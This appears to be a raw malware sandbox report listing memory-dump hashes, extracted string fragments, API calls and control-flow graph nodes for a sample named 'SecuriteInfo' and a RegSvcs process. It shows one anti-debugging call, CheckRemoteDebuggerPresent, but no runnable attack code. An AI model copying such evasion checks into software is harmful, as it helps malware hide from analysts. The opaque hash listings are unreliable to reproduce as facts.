                                                                • Instruction ID: 295e3d9d07176bf1a48e4bab82c00f939091afecc1d0b98b254aae8f1d4fb2de
                                                                • Opcode Fuzzy Hash: a4b0db5519dd578bf57e4afa1ef590e5ff1f576aa476261fa107f3bb74507fa7
                                                                • Instruction Fuzzy Hash: F1212271604200DFCB25DF98D9C4B26FFA5EB98314F20C5ADD88A4B266C33AD447CA61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction ID: 64f5268b7fa8b61339e0a31b53d8e37521622c15baf3b6b6a8968f5d7f9b8aa4
                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction Fuzzy Hash: 9D11CA72404280CFDB12CF54D9C4B56BF62FB94224F24C2A9DD090A257C33AE45ACBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction ID: 798c691eb1598b438db1389a38650b52614df392b7124c3705b3babb305877dd
                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction Fuzzy Hash: 4E11D075504280CFDB16CF54D5C4B15FF61FB44314F24C6AED8494B666C33AD40ACB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction ID: 011d33d17fa2089cf24dc02a4060d06541cd281c3725a179bce855231a52822e
                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction Fuzzy Hash: A311BB75508280DFDB12CF54C5C4B15FFA1FB84224F24C6AAD8894B296C33AD40ACB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ac4b846fa0855be34e08c620254798af3bc66d5285ebf06b33a8cbc9493676f5
                                                                • Instruction ID: c3b2a8c482569276283636514dd4326ec1db9b82d378478bea75504a3eb3f3cb
                                                                • Opcode Fuzzy Hash: ac4b846fa0855be34e08c620254798af3bc66d5285ebf06b33a8cbc9493676f5
                                                                • Instruction Fuzzy Hash: 7B01DB710083809AE7325EA9CD84B67FF98EFC1364F58C56AED194E287D779D840CA71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1966148f10bb38fc5c30eb3e54df29fd5a28ac67cafe042137cb6a6c206d4566
                                                                • Instruction ID: 434b6bbf198678fb0c4b483c5338b0624d8990b372c5283a07114f3de849417c
                                                                • Opcode Fuzzy Hash: 1966148f10bb38fc5c30eb3e54df29fd5a28ac67cafe042137cb6a6c206d4566
                                                                • Instruction Fuzzy Hash: 3EF062714043849AE7218E5ACC88B62FFA8EB91734F58C45AED084E287C3799844CAB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f701b57253df22a9a69d707320376c57b3d3886048d9df51059c6d6587fb6f8
                                                                • Instruction ID: 89ff1b0c9fde786f7ad0e3f8f4a98fee76a0028988d4211f89a71fc494710c46
                                                                • Opcode Fuzzy Hash: 8f701b57253df22a9a69d707320376c57b3d3886048d9df51059c6d6587fb6f8
                                                                • Instruction Fuzzy Hash: 4FF03CF0E5430ADFDB24DFA9C845BAEBFF4BB08224F1085A9E614E7241E7709645CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38a842c54dc830e37b4341ef1ebfb94eb910970d95a9028321c090d2f5c5bb12
                                                                • Instruction ID: 5a07389ee67daf92b1bde753afe33b142730dbae3442b27f7912874c1fba9660
                                                                • Opcode Fuzzy Hash: 38a842c54dc830e37b4341ef1ebfb94eb910970d95a9028321c090d2f5c5bb12
                                                                • Instruction Fuzzy Hash: C9F0E9F1E542049FD740CFB8A806A9ABFF0AB09228F1045EAE550D7252E3705141CF81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f1bec34df3d6a77b612d107329c21b6607ec78e39975c45f1347306c7b34be1
                                                                • Instruction ID: 7054a46de8e0c24256096595564f41f7d3d2165fd1fd73ae3a35086ce5e13300
                                                                • Opcode Fuzzy Hash: 3f1bec34df3d6a77b612d107329c21b6607ec78e39975c45f1347306c7b34be1
                                                                • Instruction Fuzzy Hash: 55F0DAB0D5420ADFDB54DFA9C845AAEBFF4BB48210F1085A9E918E7301D77096458F91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3824a504bba8604efac86bed2b850fe679183d49b7fdcbb228dbef7fc84c43da
                                                                • Instruction ID: 49cc14cf1fcc2a62988cd4e364d370f31a678d827b647bdf80e8e4cdf975260e
                                                                • Opcode Fuzzy Hash: 3824a504bba8604efac86bed2b850fe679183d49b7fdcbb228dbef7fc84c43da
                                                                • Instruction Fuzzy Hash: F6E0B6B0D40209DFD740EFB9C945B5EBFF0BF08604F1185A9D519E7212E77496458F91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 864c98456f65e9c9d679e235722583fd8cb717aeae7f99936614c413046d5e85
                                                                • Instruction ID: 83d5d85e7817a0d013f513d159869c5ee22bd1dc79612ed09871dfca54493d72
                                                                • Opcode Fuzzy Hash: 864c98456f65e9c9d679e235722583fd8cb717aeae7f99936614c413046d5e85
                                                                • Instruction Fuzzy Hash: A4D0127314010C9E9B41EE94E844D5277DCBB18600B408462E508CB021E621E674EB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: T+-q$[V~*$[V~*$]\`
                                                                • API String ID: 0-1849991408
                                                                • Opcode ID: bd8c701923142229efc0e276ae1fd60fc56381c57e171e9b53bff110e0723105
                                                                • Instruction ID: 5637a604b038e1593995a8189274ef8c4a934ae6ff646416ec23720a4a0c7367
                                                                • Opcode Fuzzy Hash: bd8c701923142229efc0e276ae1fd60fc56381c57e171e9b53bff110e0723105
                                                                • Instruction Fuzzy Hash: B0B106B0E1521ADBDB08CFAAD98499EFBF2BF89340F14D56AD815AB318D33499018F54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: T+-q$[V~*$]\`
                                                                • API String ID: 0-3978741314
                                                                • Opcode ID: 31e5416c9d1f334cc6daae88cbdfceea88864f57ad358ea7b4ef2dec7c75aadd
                                                                • Instruction ID: f84d604d290eb01d6f391a95eddda4bf067796c951abc8174dbc30ca4242fae4
                                                                • Opcode Fuzzy Hash: 31e5416c9d1f334cc6daae88cbdfceea88864f57ad358ea7b4ef2dec7c75aadd
                                                                • Instruction Fuzzy Hash: C4C168B0E1520ADBDB08CFAAD88499EFBF2FF89344F14D56AE815AB314D73499018F54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: T+-q$[V~*$]\`
                                                                • API String ID: 0-3978741314
                                                                • Opcode ID: a222119b4effd47b91a5b37a73551783318ed1365812f0f7f85f49bcf2eeb4e2
                                                                • Instruction ID: 71accc7971bd733aa84f522046b5c3d9507f4867185e9913a1f990d11848d500
                                                                • Opcode Fuzzy Hash: a222119b4effd47b91a5b37a73551783318ed1365812f0f7f85f49bcf2eeb4e2
                                                                • Instruction Fuzzy Hash: DFB127B0E1521ADBDB08CFAAD98499EFBF2BF89340F14D56AD815AB314D33499018F54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08c0468633bdad4d943c9b35bf919c8bb036eddec35936fb40386fc1a174360c
                                                                • Instruction ID: c7c10edd9205fb4d6db8856e6d002177abdc1fb7f57a56743a0a17c043215f50
                                                                • Opcode Fuzzy Hash: 08c0468633bdad4d943c9b35bf919c8bb036eddec35936fb40386fc1a174360c
                                                                • Instruction Fuzzy Hash: 67E1F9B4E002198FDB14CF99D584AAEBBB2FF89305F24D2A9D814A7355D734A941CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a94f392bbfef714e2e3b28fa9f5fc1083d7aec4de17fa5179f49d79276b0920d
                                                                • Instruction ID: 53b1ca4b20df66c0aae8a14df027f0ab73e5ad6afa0614c86b4ba2b59bd03666
                                                                • Opcode Fuzzy Hash: a94f392bbfef714e2e3b28fa9f5fc1083d7aec4de17fa5179f49d79276b0920d
                                                                • Instruction Fuzzy Hash: 62E1FCB4E001198FDB14CFA9D584AAEBBB2FF89305F24D2A9D814A7355D734AD41CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8cbe7a01060c4b6ef427b846b9e432a96200ef2d5829c2ea8f12132e1ce53c5f
                                                                • Instruction ID: 4d77fd79665175b945d7ef996d2aff6316e92947e1b0d004693b0f65b1ed37a8
                                                                • Opcode Fuzzy Hash: 8cbe7a01060c4b6ef427b846b9e432a96200ef2d5829c2ea8f12132e1ce53c5f
                                                                • Instruction Fuzzy Hash: 34E1E9B4E002198FDB14DF99D580AAEFBB2FF89305F24D2A9E814A7355D734A941CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c41fc802cd4d923fd3cf6ce878ae6d60204006e84c95944ef31f3d27272afd61
                                                                • Instruction ID: b0cc8682c202429ba4cca33991d27825e6adcbf7a3fcba4f9cfec547dd2febd8
                                                                • Opcode Fuzzy Hash: c41fc802cd4d923fd3cf6ce878ae6d60204006e84c95944ef31f3d27272afd61
                                                                • Instruction Fuzzy Hash: 38E1FDB4E0021A8FDB14DF99D584AAEFBB2FF89305F2491A9D814A7356D730AD41CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 108028cc1c7538541ad0d6cac559f859c91db91ac6840fc55692b49b46ab2309
                                                                • Instruction ID: 3ff4dedd30cb892ea4ef3b902bfc51ac66330f43573a62d2881cce9f6a55bafb
                                                                • Opcode Fuzzy Hash: 108028cc1c7538541ad0d6cac559f859c91db91ac6840fc55692b49b46ab2309
                                                                • Instruction Fuzzy Hash: 25E1EBB4E0021A8FDB14CF99D580AAEBBB2FF89305F2491A9D814A7355D731AD41CF64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 25b4db03aabe1dceb2effabe0fe479f6ea8b4bd2402a7bab00f110765d33054b
                                                                • Instruction ID: 2bd1c6fb1d28f4116ef355c60f0a25348ecae4f3b575c3f21a2663b911e31f8e
                                                                • Opcode Fuzzy Hash: 25b4db03aabe1dceb2effabe0fe479f6ea8b4bd2402a7bab00f110765d33054b
                                                                • Instruction Fuzzy Hash: 9DD1373192075A9ACB11EB68D994A9DF771FF96300F10C7AAD0493B225EB706AC5CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24909a4205959a52ae2aed891282efee02e8a3fda3e5e752c66ce662142b8d63
                                                                • Instruction ID: 9e85a402b0a9f62d5b2bd63da3d473d16986a1050fba9b40c236a52e3f0402a0
                                                                • Opcode Fuzzy Hash: 24909a4205959a52ae2aed891282efee02e8a3fda3e5e752c66ce662142b8d63
                                                                • Instruction Fuzzy Hash: 8BD1273192071B9ACB11EB64D994A9DF371FF96300F10C7AAD0493B225EB706AC5CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 488e0064dee09adb09467c6a26c9f2ee42fb1fe1429e0f43232dcf3f632c714d
                                                                • Instruction ID: a8a0f240a9b295d6e62b6059594960a4e1e77e1d5472e42ee8ec23fe36657b53
                                                                • Opcode Fuzzy Hash: 488e0064dee09adb09467c6a26c9f2ee42fb1fe1429e0f43232dcf3f632c714d
                                                                • Instruction Fuzzy Hash: 06A16232E002198FCF06DFB4C54459EFBB2FF85300B15856AE906AF255DB71E956CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd0848b5738f47cb9577d4b5556b69208bb9f1c9ce92add0ca7c492d1784844c
                                                                • Instruction ID: 32533ed50e34c233cc168fa90ad729a8f44481b1a8b9cb72ba05f24e59a04040
                                                                • Opcode Fuzzy Hash: bd0848b5738f47cb9577d4b5556b69208bb9f1c9ce92add0ca7c492d1784844c
                                                                • Instruction Fuzzy Hash: 90D10731D2075A9ACB11EB64D994A9DF371FF96300F10C7AAD0493B225EB706AC5CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8353b03b70ace3b0a08b5d6103e3d6d8043bf429cc395902993e96747492b79e
                                                                • Instruction ID: 8e0744d50b3887e09de7041f825bb51801f7cd78bf69408e8e578a79a60900d2
                                                                • Opcode Fuzzy Hash: 8353b03b70ace3b0a08b5d6103e3d6d8043bf429cc395902993e96747492b79e
                                                                • Instruction Fuzzy Hash: 3751E6B4E19209DFEB08CF9AD5446EEFBFAEF8A300F149066E819A7211D7346941CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be7d6df57bac95af4cc7dd35dc17fadc4d60e85e7a318090796bd128b2775053
                                                                • Instruction ID: 4112f47d3af75034cab11889778857f6dabc362406fa78a07b8cf6ad92662705
                                                                • Opcode Fuzzy Hash: be7d6df57bac95af4cc7dd35dc17fadc4d60e85e7a318090796bd128b2775053
                                                                • Instruction Fuzzy Hash: 2A51FAB4E0021A8BDB14CFA9D5845AEBBF3FF89305F24D1A9D818A7315D7319942CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetSystemMetrics.USER32(00000005), ref: 0570F2AE
                                                                • GetSystemMetrics.USER32(00000006), ref: 0570F2E8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688060136.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5700000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID: g.D
                                                                • API String ID: 4116985748-477188214
                                                                • Opcode ID: edd1f19e51bf8818c5c13db104b83e58dcc0fe2f1f7e8e4a9507ad30de27e141
                                                                • Instruction ID: 46fcb22aca0430e67274d6336caaa374dd3daa68b0e1671968eefd526ce5d3a9
                                                                • Opcode Fuzzy Hash: edd1f19e51bf8818c5c13db104b83e58dcc0fe2f1f7e8e4a9507ad30de27e141
                                                                • Instruction Fuzzy Hash: C42187B1804348CFCB20DF99D449B9EFFF0AB09324F20805AD459A7381C7749588CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetSystemMetrics.USER32(00000005), ref: 0570F2AE
                                                                • GetSystemMetrics.USER32(00000006), ref: 0570F2E8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688060136.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5700000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID: g.D
                                                                • API String ID: 4116985748-477188214
                                                                • Opcode ID: 43b5f24db1924d00597adaa5236248f798ee646df19f132cf0d0b3efe3bf7b19
                                                                • Instruction ID: a08e672a9bee35840aca8a60516f0f200470ccef674d1236027f327557b34bc2
                                                                • Opcode Fuzzy Hash: 43b5f24db1924d00597adaa5236248f798ee646df19f132cf0d0b3efe3bf7b19
                                                                • Instruction Fuzzy Hash: C22134B4804748CFDB20DF99C449B9EFFF4AB08328F20841AD459A7290C374A988CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:11.7%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:100%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 26318 e57ec8 26319 e57f0c CheckRemoteDebuggerPresent 26318->26319 26320 e57f4e 26319->26320

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 127 67066d8-67066f9 128 67066fb-67066fe 127->128 129 6706704-6706723 128->129 130 6706e9f-6706ea2 128->130 139 6706725-6706728 129->139 140 670673c-6706746 129->140 131 6706ea4-6706ec3 130->131 132 6706ec8-6706eca 130->132 131->132 134 6706ed1-6706ed4 132->134 135 6706ecc 132->135 134->128 137 6706eda-6706ee3 134->137 135->134 139->140 142 670672a-670673a 139->142 145 670674c-670675b 140->145 142->145 253 670675d call 6706ef1 145->253 254 670675d call 6706ef8 145->254 146 6706762-6706767 147 6706774-6706a51 146->147 148 6706769-670676f 146->148 169 6706e91-6706e9e 147->169 170 6706a57-6706b06 147->170 148->137 179 6706b08-6706b2d 170->179 180 6706b2f 170->180 181 6706b38-6706b3f 179->181 180->181 183 6706b46-6706b4b 181->183 184 6706b51-6706b73 183->184 185 6706e78-6706e84 183->185 184->185 188 6706b79-6706b83 184->188 185->170 186 6706e8a 185->186 186->169 188->185 189 6706b89-6706b94 188->189 189->185 190 6706b9a-6706c70 189->190 202 6706c72-6706c74 190->202 203 6706c7e-6706cae 190->203 202->203 207 6706cb0-6706cb2 203->207 208 6706cbc-6706cc8 203->208 207->208 209 6706d28-6706d2c 208->209 210 6706cca-6706cce 208->210 211 6706d32-6706d6e 209->211 212 6706e69-6706e72 209->212 210->209 213 6706cd0-6706cfa 210->213 223 6706d70-6706d72 211->223 224 6706d7c-6706d8a 211->224 212->185 212->190 220 6706d08-6706d25 213->220 221 6706cfc-6706cfe 213->221 220->209 221->220 223->224 227 6706da1-6706dac 224->227 228 6706d8c-6706d97 224->228 231 6706dc4-6706dd5 227->231 232 6706dae-6706db4 227->232 228->227 233 6706d99 228->233 237 6706dd7-6706ddd 231->237 238 6706ded-6706df9 231->238 234 6706db6 232->234 235 6706db8-6706dba 232->235 233->227 234->231 235->231 239 6706de1-6706de3 237->239 240 6706ddf 237->240 242 6706e11-6706e62 238->242 243 6706dfb-6706e01 238->243 239->238 240->238 242->212 244 6706e03 243->244 245 6706e05-6706e07 243->245 244->242 245->242 253->146 254->146
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2392861976
                                                                • Opcode ID: 1562ed44075344747bc09c12bd429ba865f1afc40059ba9226c6a037edcf26a3
                                                                • Instruction ID: e5bdd54ca492a3c97afa31cd5893b65986f1b4f6537146d36eef76be4eb8a14d
                                                                • Opcode Fuzzy Hash: 1562ed44075344747bc09c12bd429ba865f1afc40059ba9226c6a037edcf26a3
                                                                • Instruction Fuzzy Hash: 93321031E1071ACFDB14EF74D95459DB7F6BFC9300F2086AAD409AB264EB30A985CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 866 670b3c0-670b3de 867 670b3e0-670b3e3 866->867 868 670b404-670b407 867->868 869 670b3e5-670b3ff 867->869 870 670b409-670b425 868->870 871 670b42a-670b42d 868->871 869->868 870->871 872 670b43a-670b43d 871->872 873 670b42f-670b439 871->873 875 670b454-670b456 872->875 876 670b43f-670b44d 872->876 878 670b458 875->878 879 670b45d-670b460 875->879 882 670b466-670b47c 876->882 884 670b44f 876->884 878->879 879->867 879->882 886 670b482-670b48b 882->886 887 670b697-670b6a1 882->887 884->875 888 670b491-670b4ae 886->888 889 670b6a2-670b6a9 886->889 898 670b684-670b691 888->898 899 670b4b4-670b4dc 888->899 892 670b6ab-670b6ae 889->892 893 670b71c-670b723 889->893 896 670b6b0-670b6b5 892->896 897 670b6b6-670b6d7 892->897 895 670b72a-670b72c 893->895 900 670b743-670b77c 895->900 901 670b72e-670b731 895->901 896->897 902 670b6d9-670b6dc 897->902 898->886 898->887 899->898 922 670b4e2-670b4eb 899->922 911 670b7b8-670b7c7 900->911 939 670b77e-670b788 900->939 903 670b9f9-670ba02 901->903 904 670b6e2-670b6ee 902->904 905 670b789-670b78c 902->905 912 670b6f9-670b6fb 904->912 906 670b78e-670b7aa 905->906 907 670b7af-670b7b2 905->907 906->907 910 670b9e7-670b9e9 907->910 907->911 915 670b9f0-670b9f3 910->915 916 670b9eb 910->916 928 670b7e6-670b82a 911->928 929 670b7c9-670b7e4 911->929 918 670b713-670b717 912->918 919 670b6fd-670b703 912->919 915->902 915->903 916->915 920 670b725 918->920 921 670b719 918->921 924 670b705 919->924 925 670b707-670b709 919->925 920->895 921->893 922->889 927 670b4f1-670b50d 922->927 924->918 925->918 937 670b672-670b67e 927->937 938 670b513-670b53d 927->938 935 670b830-670b841 928->935 936 670b9bb-670b9d0 928->936 929->928 944 670b9a6-670b9b5 935->944 945 670b847-670b864 935->945 936->910 